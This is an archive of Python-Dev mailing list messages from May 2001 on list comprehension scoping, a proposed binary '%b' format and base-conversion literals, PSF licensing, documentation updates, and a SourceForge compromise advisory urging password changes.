From tim.one at home.com Wed May 30 22:22:19 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 16:22:19 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley, pretty much repeats why he doesn't like the current scheme] I hoped it was clear the first time I was at least half sympathetic! If it wasn't, I am . >> >>> i = 12 >> >>> (lambda: [i**2 for i in range(4)])() >> [0, 1, 4, 9] >> >>> i >> 12 >> >>> >> >> That's more like Haskell does it. > Ah yes, well this is exactly the kind of behavior that seems most > natural to me. It's also the behavior that everyone expected went I > went around to the various Python hackers in the department and asked > them about it yesterday. I believe that. > I suppose I could just write this: > > a = (lambda s: [2*i for i in s])(s) > > However, that's pretty ugly. It's too complicated, isn't it? In the presence of nested scopes (which are reality in 2.2), a = (lambda: [2*i for i in s])() does the same thing and is conceptually clearer. I'm not suggesting that you actually write that, but view it as a *model* for your intended semantics. I wouldn't want to see the implementation actually use a lambda under the covers, either, but we need some crisp way to explain the intent. Note that the lambda-trick *model* "does the right thing" for for-loop targets like x.i and x[i] too. > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. I would certainly love to see a fix for > it (I would even volunteer to work on a prototype implementation if > there is interest). I encourage that, but since it's not 100% backward-compatible you'll enjoy the usual range of hysterical opposition. Needs a PEP, and possibly even an associated future-statement. Overall, I'm more in favor of changing it than not. 
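The two models under discussion can be put side by side in a small sketch. The helper names `loop_model`, `lambda_model` and `attribute_target` are hypothetical, and the code assumes a Python 3 interpreter with nested scopes; it illustrates the semantics Tim describes, not how any interpreter actually implements them.

```python
def loop_model(s):
    """[2*x for x in s] expanded into nested-loop statements."""
    x = "outer"
    t = []
    for x in s:          # the loop target rebinds the function's own x
        t.append(2 * x)
    return t, x

def lambda_model(s):
    """The same comprehension evaluated inside a throwaway function."""
    x = "outer"
    t = (lambda: [2 * x for x in s])()   # this x is local to the lambda
    return t, x

class Box:
    pass

def attribute_target():
    """Under the lambda model an attribute target still mutates the outer object."""
    box = Box()
    ones = (lambda: [1 for box.i in range(3)])()
    return ones, box.i

print(loop_model([1, 2, 3]))    # ([2, 4, 6], 3)
print(lambda_model([1, 2, 3]))  # ([2, 4, 6], 'outer')
print(attribute_target())       # ([1, 1, 1], 2)
```

As Tim notes, the lambda model still assigns a target such as `box.i` on the outer object, so that use keeps working. Only bare-name targets stop leaking.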
From skip at pobox.com Wed May 30 22:48:47 2001 From: skip at pobox.com (Skip Montanaro) Date: Wed, 30 May 2001 15:48:47 -0500 Subject: [Python-Dev] scoping and list comprehensions Message-ID: <15125.23727.168431.762320@beluga.mojam.com> Regarding the issue of how list comprehensions should relate to their environment, perhaps instead of modifying list comprehensions to make them execute in new local scopes (or at least appear to) a better solution would be to allow a new local scope to be introduced inline, sort of like in C: { int i; for (i=0; i < 10; i++) { dostuffwith(i); } } While this might be used more for list comprehensions than other constructs, I'm sure people will find a way to (ab)use it for other things as well. I don't see an obvious way of adding such functionality to Python without introducing a new keyword though, which is going to make it difficult to get past Guido: l = [] scope: l = [i**2 for i in range(10)] print l Hmmm, wait a minute, what if you terminated a block introducer (if or while clause or try/except clauses) with something other than a colon? (I'm just thinking out loud, I don't think this is necessarily a good solution). if 1: # no new scope introduced l = [i**2 for i in range(10)] print l vs. if 1; # new scope introduced for enclosed block l = [i**2 for i in range(10)] print l That certainly has some line noise qualities about it, especially since colons and semicolons are visually so similar, but does offer an alternative to introducing a new keyword into the language. Hmmm, wait another minute, perhaps you could simply overload def: l = [] def: l = [i**2 for i in range(10)] print l There's also the problem of how to export results from the scope, though perhaps the new nested scope stuff provides a solution to that. (I've ignored them so far, so I can't tell...) Would it be possible for the compiler to recognize the degenerate def: and simply mangle any names that would clash instead of introducing an actual new execution frame? 
The above might be equivalent to l = [] l = [__mangled_i**2 for __mangled_i in range(10)] print l if 'i' already existed in the same scope. Just thinking out loud. I'm not sure any of these ideas is any better than the current state of affairs. Skip From Greg.Wilson at baltimore.com Wed May 30 23:11:16 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 30 May 2001 17:11:16 -0400 Subject: [Python-Dev] %b format? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> I would like to add a "%b" format for converting numbers to binary format (1's and 0's). I realize this isn't a C-ism, but it would be very useful for teaching purposes, as newcomers find 101101 a lot easier to understand than 0x2D. Reactions? Greg From esr at thyrsus.com Wed May 30 23:28:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:28:38 -0400 Subject: [Python-Dev] %b format?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <20010530172838.A778@thyrsus.com> Greg Wilson : > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). I realize > this isn't a C-ism, but it would be very useful for > teaching purposes, as newcomers find 101101 a lot > easier to understand than 0x2D. > > Reactions? +1. Didactically pretty useful, and the additional code won't boost global complexity much. -- Eric S. Raymond Where rights secured by the Constitution are involved, there can be no rule making or legislation which would abrogate them. -- Miranda vs. Arizona, 384 US 436 p. 491 From tim.one at home.com Wed May 30 23:30:49 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 17:30:49 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: <20010530131424.Y690@xs4all.nl> Message-ID: [Thomas Wouters] > This raises an interesting point. Do we want separate pieces of the > Python distribution to have separate licences ? This is a question for the PSF to resolve, since the PSF is intended to become the sole legal owner of Python's IP rights. My position will be that nothing ships in the distribution unless copyright has been assigned to the PSF, or the contributor has agreed to give the PSF a non-exclusive irrevocable etc license to release their work under the PSF license du jour. Fleshing out the second option so as to prevent abuse on either side is going to require significant effort ("what if the PSF goes away?", "what if the PSF changes its license to something I hate?", "what if I change my mind?", etc). Unfortunately, significant effort takes significant time too, and nobody has started on this yet. 
From mal at lemburg.com Wed May 30 23:31:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 23:31:06 +0200 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> Message-ID: <3B15669A.43B70A44@lemburg.com> "Eric S. Raymond" wrote: > > Greg Wilson : > > I would like to add a "%b" format for converting > > numbers to binary format (1's and 0's). I realize > > this isn't a C-ism, but it would be very useful for > > teaching purposes, as newcomers find 101101 a lot > > easier to understand than 0x2D. > > > > Reactions? > > +1. Didactically pretty useful, and the additional code won't boost > global complexity much. Good idea. The only question I have is: in which order will you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I am thinking of adding a bit field type to mxNumber and have the same problem there... -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Wed May 30 23:42:22 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:42:22 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400 References: <20010530131424.Y690@xs4all.nl> Message-ID: <20010530174222.A1019@thyrsus.com> Tim Peters : > My position will be that nothing ships in the distribution unless copyright > has been assigned to the PSF, or the contributor has agreed to give the PSF > a non-exclusive irrevocable etc license to release their work under the PSF > license du jour. 
Fleshing out the second option so as to prevent abuse on > either side is going to require significant effort ("what if the PSF goes > away?", "what if the PSF changes its license to something I hate?", "what if > I change my mind?", etc). > > Unfortunately, significant effort takes significant time too, and nobody has > started on this yet. I think a PSF pledge to use only an OSI-certified license would address some of these issues. Write it into the bylaws if necessary. -- Eric S. Raymond He that would make his own liberty secure must guard even his enemy from oppression: for if he violates this duty, he establishes a precedent that will reach unto himself. -- Thomas Paine From esr at thyrsus.com Wed May 30 23:44:57 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:44:57 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530174457.B1019@thyrsus.com> M.-A. Lemburg : > > > I would like to add a "%b" format for converting > > > numbers to binary format (1's and 0's). I realize > > > this isn't a C-ism, but it would be very useful for > > > teaching purposes, as newcomers find 101101 a lot > > > easier to understand than 0x2D. > > > > +1. Didactically pretty useful, and the additional code won't boost > > global complexity much. > > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? > > I am thinking of adding a bit field type to mxNumber and have > the same problem there... For *this* context, we clearly want mathematical notation; MSB to the right and no byte-swapping. After all we'd actually be printing numerals, not dumping a bitfield. -- Eric S.
Raymond The people of the various provinces are strictly forbidden to have in their possession any swords, short swords, bows, spears, firearms, or other types of arms. The possession of unnecessary implements makes difficult the collection of taxes and dues and tends to foment uprisings. -- Toyotomi Hideyoshi, dictator of Japan, August 1588 From barry at digicool.com Wed May 30 23:49:22 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 17:49:22 -0400 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <15125.27362.431144.886216@anthem.wooz.org> >>>>> "GW" == Greg Wilson writes: GW> I would like to add a "%b" format for converting numbers to GW> binary format (1's and 0's). For completeness, wouldn't you also want a binary integer literal so your students could write binary numbers in their code? And what about a binary() operator a la hex()? -Barry From tim.one at home.com Wed May 30 23:50:31 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 17:50:31 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com> Message-ID: [Greg Wilson] > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to %o is to __oct__ as nothing is to %b is to nothing. In that respect it's unfortunate that Python has distinct nb_oct and nb_hex slots in the PyNumberMethods struct (as opposed to a single parameterized "convert to base N string" method). [MAL] > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I'm sure Greg has in mind only integers, in which case %x and %o already give the only useful answer. 
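A minimal sketch of the proposed conversion, assuming integer input only (as Tim suggests) and emitting digits most significant first, the order `%x` and `%o` already use. The helper `to_base` is hypothetical. It also handles every base that `int(s, base)` accepts (2 to 36), the missing inverse mentioned later in this thread. For comparison, later Python versions (2.6 and 3.0) gained `bin()`, `0b` literals and a `'b'` type for `format()`. None of these existed at the time of this thread.

```python
import string

# Digit symbols for bases up to 36: '0'..'9' followed by 'a'..'z'.
DIGITS = string.digits + string.ascii_lowercase

def to_base(n: int, base: int = 2) -> str:
    """Render integer n in `base`, most significant digit first.

    Hypothetical helper, intended as an inverse of int(s, base).
    """
    if not 2 <= base <= 36:
        raise ValueError("base must be in 2..36")
    if n == 0:
        return "0"
    sign = "-" if n < 0 else ""
    n = abs(n)
    out = []
    while n:
        n, r = divmod(n, base)
        out.append(DIGITS[r])             # least significant digit comes out first...
    return sign + "".join(reversed(out))  # ...so reverse for MSB-first output

print(to_base(0x2D), to_base(13, 3), bin(0x2D))  # 101101 111 0b101101
```

Peeling off digits with `divmod` produces them least significant first, which is why the list is reversed before joining. `int("111", 3)` recovers 13, matching Tim's example.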
From fdrake at cj42289-a.reston1.va.home.com Wed May 30 23:51:22 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 17:51:22 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Update for development version of Python (2.2). This update substantially re-works the prototype support for productions of a formal grammar. They look better, support forward references to symbol definitions, and allow download of an all-text version of the complete grammar (with productions ordered the same way as they are in the documentation sources). "Documenting Python" now includes documentation for the LaTeX markup used to describe productions: http://python.sourceforge.net/devel-docs/doc/grammar-displays.html From esr at thyrsus.com Thu May 31 00:05:09 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:05:09 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400 References: <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530180509.B1305@thyrsus.com> Tim Peters : > -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to > %o is to __oct__ as nothing is to %b is to nothing. In that respect it's > unfortunate that Python has distinct nb_oct and nb_hex slots in the > PyNumberMethods struct (as opposed to a single parameterized "convert to > base N string" method). Is the right answer to add the convert-to-base slot and deprecate the other two? -- Eric S. Raymond If gun laws in fact worked, the sponsors of this type of legislation should have no difficulty drawing upon long lists of examples of criminal acts reduced by such legislation.
That they cannot do so after a century and a half of trying -- that they must sweep under the rug the southern attempts at gun control in the 1870-1910 period, the northeastern attempts in the 1920-1939 period, the attempts at both Federal and State levels in 1965-1976 -- establishes the repeated, complete and inevitable failure of gun laws to control serious crime. -- Senator Orrin Hatch, in a 1982 Senate Report From fdrake at acm.org Thu May 31 00:00:15 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 18:00:15 -0400 (EDT) Subject: [Python-Dev] Most recent documentation update Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> One thing I forgot to mention in my announcement of the update to the development documentation which I just posted is that I went ahead and converted all but one of the productions in the Reference Manual to the new markup. The print_stmt production, unfortunately, is given twice instead of using a single model for the statement. The formatting tools don't support that (yet), and it's not clear that they should. (No, Barry, don't go changing it...!) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From esr at thyrsus.com Thu May 31 00:03:41 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:03:41 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530180341.A1305@thyrsus.com> Barry A. Warsaw : > > >>>>> "GW" == Greg Wilson writes: > > GW> I would like to add a "%b" format for converting numbers to > GW> binary format (1's and 0's). > > For completeness, wouldn't you also want a binary integer literal so > your students could write binary numbers in their code? And what > about a binary() operator a la hex()?
Barry is correct. If we're going to do this, we ought to do it right and support binary on a par with decimal, hex, and octal. I favor this. -- Eric S. Raymond The direct use of physical force is so poor a solution to the problem of limited resources that it is commonly employed only by small children and great nations. -- David Friedman From barry at digicool.com Thu May 31 00:05:37 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 18:05:37 -0400 Subject: [Python-Dev] Most recent documentation update References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> Message-ID: <15125.28337.938136.505675@anthem.wooz.org> >>>>> "Fred" == Fred L Drake, Jr writes: Fred> (No, Barry, don't go changing it...!) Oh darn, three whole days work wasted... :) From tim.one at home.com Thu May 31 00:17:42 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 18:17:42 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: Note that in Vyper (John Skaller's Python variant) these are legit integer literals: 0b11111111 0B11111111 0o777 0O777 0d999 0D999 0xfFf 0XFFf Vyper's octal notation is still ugly, but whoever first thought 0777 != 777 was a "good idea" was certifiably insane <0.25 wink>. From tim.one at home.com Thu May 31 00:29:33 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 18:29:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530180509.B1305@thyrsus.com> Message-ID: [Eric S. Raymond] > Is the right answer to add the convert-to-base slot and deprecate the > other two? That would fix "the other" lump here in Python, that e.g. >>> int("111", 3) 13 >>> has no inverse. string->int is happy with any base in 2..36 inclusive, but int->string is spelled via 3 different builtins covering only 3 of those bases. It would be more *expedient* to add "just" a __bin__/nb_bin method + a way to spell binary int literals + a %b format + a bin() builtin. 
On the fifth hand, I doubt anyone would want to add new % format codes for bases {2..36} - {2, 8, 10, 16}. So it will remain lumpy no matter what. I look forward to the PEP . From esr at thyrsus.com Thu May 31 00:38:33 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:38:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530183833.B1654@thyrsus.com> Tim Peters : > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. For anyone who doesn't know the history behind this... The 0xxx notation was copied from PDP-11 assembler literals -- the instruction-set design of the PDP-11 was such that most of the instruction subfields fit in octal digits, so this convention made it somewhat easier to read machine-code dumps. While I'm at it, I should note that the design of the 11 was ancestral to both the 8088 and 68000 microprocessors, and thus to essentially every new general-purpose computer designed in the last fifteen years. -- Eric S. Raymond "Are we to understand," asked the judge, "that you hold your own interests above the interests of the public?" "I hold that such a question can never arise except in a society of cannibals." -- Ayn Rand From esr at thyrsus.com Thu May 31 00:39:43 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:39:43 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400 References: <20010530180509.B1305@thyrsus.com> Message-ID: <20010530183943.C1654@thyrsus.com> Tim Peters : > [Eric S. Raymond] > > Is the right answer to add the convert-to-base slot and deprecate the > > other two? > > That would fix "the other" lump here in Python, that e.g. > > >>> int("111", 3) > 13 > >>> > > has no inverse. 
string->int is happy with any base in 2..36 inclusive, but > int->string is spelled via 3 different builtins covering only 3 of those > bases. That sounds like a strong argument to me. -- Eric S. Raymond The world is filled with violence. Because criminals carry guns, we decent law-abiding citizens should also have guns. Otherwise they will win and the decent people will lose. -- James Earl Jones From nas at python.ca Thu May 31 00:38:58 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 30 May 2001 15:38:58 -0700 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530153858.A21901@glacier.fnational.com> Tim Peters wrote: > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. Ever used MacLisp or ZetaLisp? There: 777 == 0d511 If only we had been born with 8 or 16 fingers, right? Neil From thomas at xs4all.net Thu May 31 03:52:48 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 03:52:48 +0200 Subject: [Python-Dev] SF hacked Message-ID: <20010531035248.G690@xs4all.nl> It *seems*, from this site: http://66.92.75.28/~vladimir/themes-org.html that SourceForge has been hacked, and more seriously than SF first admits (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) And the same goes for apache.org, it looks like. Anyway, if anyone connected *from* any of sourceforge's machines to anywhere else, in the last couple of months, they'll be well advised to change their passwords and check for intruders. The same goes if you connect through ssh and (foolishly ;) allowed ssh-agent-forwarding to the SF machines. In that case, better check all the machines that ssh-agent would give you unpassworded access to for logins you don't recognize. 
The site above lists a number of sniffed passwords, in case you want to check, but there's no reason for the hacker not to have even more sniffed passwords lying about :) And if you have a login on apache.org, you probably want to change your password in any case.... the above listed site has what seems to be a copy of the shadow password file. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Thu May 31 05:53:53 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 23:53:53 -0400 Subject: [Python-Dev] One more dict trick Message-ID: If anyone has an app known or suspected to be sensitive to dict timing, please try the patch here. Best I've been able to tell, it's a win. But it's a radical change in approach, so I don't want to rush it. This gets rid of the polynomial machinery entirely, along with the branches associated with updating the things, and the dictobject struct member holding the table's poly. Instead it relies on that i = (5*i + 1) % n is a full-period RNG whenever n is a power of 2 (that's what guarantees it will visit every slot), but perturbs that by adding in a few bits from the full hash code shifted right each time (that's what guarantees every bit of the hash code eventually influences the probe sequence, avoiding simple quadratic-time degenerate cases). -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: dict.txt URL: From tim.one at home.com Thu May 31 06:46:56 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 31 May 2001 00:46:56 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530183833.B1654@thyrsus.com> Message-ID: [ESR] > The 0xxx notation was copied from PDP-11 assembler literals -- the > instruction-set design of the PDP-11 was such that most of the > instruction subfields fit in octal digits, so this convention made it > somewhat easier to read machine-code dumps. 
That doesn't mean they weren't certifiably insane. At Cray, we had a much more sensible convention: *all* numbers were octal (yes, it was a 64-bit box and octal didn't make any sense, but Seymour Cray got used to it from the 60-bit CDC w/ 18-bit address registers and didn't feel like changing). My first boss there loved telling the story about how he was out for a drive with the family, and excitedly screamed "Hey, kids! Look! The odometer is just about to change to 40,000!". Of course it read 37,777.9 at the time, and they thought he was nuts. That's where this kind of thing always leads in the end. to-disgrace-despair-and-eventually-ruin-ly y'rs - tim From tim.one at home.com Thu May 31 06:48:28 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 31 May 2001 00:48:28 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530153858.A21901@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Ever used MacLisp or ZetaLisp? There: > > 777 == 0d511 > > If only we had been born with 8 or 16 fingers, right? Then guys would probably be attracted to base 9 or 17. sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs - tim From greg at cosc.canterbury.ac.nz Thu May 31 07:15:24 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:15:24 +1200 (NZST) Subject: [Python-Dev] scoping and list comprehensions In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com> Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz> Skip: > scope: > l = [i**2 for i in range(10)] By analogy with C, the introducer of a new scope should simply be an unadorned colon: : l = [i**2 for i in range(10)] :-) While this might be useful, it doesn't really address the issue raised, because we really need a new scope per listcomp (or maybe even each 'for' in the listcomp). > There's also the problem of how to export results from the scope, though > perhaps the new nested scope stuff provides a solution to that.
Nope -- there's still no way to assign to any name in an intermediate scope. Something heretical, such as declarations, would be needed. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:16:11 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:11 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz> Tim: > >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in > digits] Yikes! That would be clearer as [[x,y,z] for x in digits for y in digits for z in digits] I'll concede it's nowhere near as much fun, though... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:16:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:41 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Tim: > Needs a PEP, and possibly > even an associated future-statement. Overall, I'm more in favor of changing > it than not. If we do this, we also need to consider whether we want to make the corresponding change to regular for-loops. Seems to me that all the reasons it's a good idea for listcomps apply to for-loops as well. Another advantage of changing both together is that we can continue to describe listcomp semantics in terms of for-loops instead of lambdas. 
Then we won't have to go into hiding until Guido dies or lifts the fatwah against us. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:17:16 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:17:16 +1200 (NZST) Subject: [Python-Dev] %b format? In-Reply-To: Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Tim: > On the fifth hand, I doubt anyone would want to add new % format codes for > bases {2..36} - {2, 8, 10, 16}. So, just add one general one: %m.nb with n being the base. If n defaults to 2, you can read the "b" as either "base" or "binary". Literals: 0b(5)21403 general 0b11001101 binary Conversion functions: base(x, n) general bin(x) equivalent to base(x, 2) (for symmetry with existing hex, oct) Type slots: __base__(x, n) Backwards compatibility measures: hex(x) --> base(x, 16) oct(x) --> base(x, 8) bin(x) --> base(x, 2) base(x, n) checks __hex__ and __oct__ slots for special cases of n=16 and n=8, falls back on __base__ There, that takes care of integers. Anyone want to do the equivalent for floats ?-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From esr at thyrsus.com Thu May 31 08:01:54 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 02:01:54 -0400 Subject: [Python-Dev] %b format? 
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200 References: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: <20010531020154.A4404@thyrsus.com> Greg Ewing : > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". I had a similar idea, but your version is more elegant. -- Eric S. Raymond The common argument that crime is caused by poverty is a kind of slander on the poor. -- H. L. Mencken From tim_one at email.msn.com Thu May 31 08:20:21 2001 From: tim_one at email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:20:21 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > If we do this, we also need to consider whether we want > to make the corresponding change to regular for-loops. > Seems to me that all the reasons it's a good idea for > listcomps apply to for-loops as well. I expect there's no chance: unlike listcomps, for-loops allow break statements, and search loops that use the for index after a break (and out of the loop!) are common. > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops But I'm afraid that's also an advantage of leaving both alone. > instead of lambdas. > > Then we won't have to go into hiding until Guido dies or lifts > the fatwah against us. Death won't stop him -- he's Dutch . From tim_one at email.msn.com Thu May 31 08:28:04 2001 From: tim_one at email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:28:04 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". 
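Greg's general `base(x, n)` conversion is easy to prototype in pure Python. The sketch below is hypothetical. The name `to_base` and the digit alphabet (0-9 then a-z, the same range `int()` accepts when parsing) are assumptions, not an API that was adopted. It round-trips through `int(s, n)`. The last lines compare it with the binary support that later Python releases (2.6 onward) did add: the `0b` literal prefix, `bin()`, and the `'b'` format type.

```python
import string

# Digits for bases 2..36, matching the alphabet int() accepts for parsing.
DIGITS = string.digits + string.ascii_lowercase


def to_base(x, n):
    """Hypothetical general int->string conversion, the inverse of int(s, n)."""
    if not 2 <= n <= 36:
        raise ValueError("base must be in 2..36")
    if x == 0:
        return "0"
    sign = "-" if x < 0 else ""
    x = abs(x)
    out = []
    while x:
        x, r = divmod(x, n)
        out.append(DIGITS[r])
    return sign + "".join(reversed(out))


# Round trip through int(), which already accepts any base in 2..36.
for value, base in [(511, 8), (205, 2), (255, 16), (12345, 36)]:
    assert int(to_base(value, base), base) == value

# Binary support that exists in current Python, for comparison.
print(to_base(205, 2))    # 11001101
print(bin(205))           # 0b11001101
print(format(205, "b"))   # 11001101
print(0b11001101 == 205)  # True
```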
